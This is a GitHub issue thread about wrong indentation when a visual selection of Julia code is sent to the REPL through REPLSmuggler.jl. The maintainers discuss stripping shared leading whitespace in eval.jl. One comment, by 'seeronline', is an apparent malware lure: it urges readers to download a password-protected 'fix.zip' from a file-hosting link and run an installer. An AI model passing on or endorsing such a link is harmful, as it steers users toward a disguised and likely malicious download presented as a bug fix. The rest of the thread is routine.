### ISSUE TITLE
Indent is wrong  when sending a visual selection 

### ISSUE THREAD

**Issue by ArbitRandomUser** [Klafyvel/REPLSmuggler.jl#41]
take this bit of code 
```julia
for i in 1:10
    for j in 1:10
        nothing
    end
end
```

if you visually select and send only the inner loop the indent isn't right in the repl.

```
julia> for j in 1:10
               nothing
           end
```

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by fredrikekre** [comment]
Would you expect/prefer
```
julia>     for j in 1:10
               nothing
           end
```
or
```
julia> for j in 1:10
           nothing
       end
```
?

**Comment by Klafyvel** [comment]
I think the second option looks prettier.

**Comment by ArbitRandomUser** [comment]
https://github.com/Klafyvel/REPLSmuggler.jl/blob/a303b354f45076a99362ab45847dabf59d0ba348/src/eval.jl#L50 

is the `strip` necessary here?

**Comment by Klafyvel** [comment]
It would be on the Julia side, in eval.jl. You can have a quite verbose output if you enable debug prints (`ENV["JULIA_DEBUG"] = REPLSmuggler`).

**Comment by Klafyvel** [comment]
> https://github.com/Klafyvel/REPLSmuggler.jl/blob/a303b354f45076a99362ab45847dabf59d0ba348/src/eval.jl#L50
> 
> is the `strip` necessary here?

Ah, you're faster than me. :) I put it because I find it uggly when I send big chunks of code and they are displayed with empty lines at the begining.

**Comment by fredrikekre** [comment]
It is probably reasonable to strip leading and trailing lines, and remove all "shared" whitespace from the start of each line.
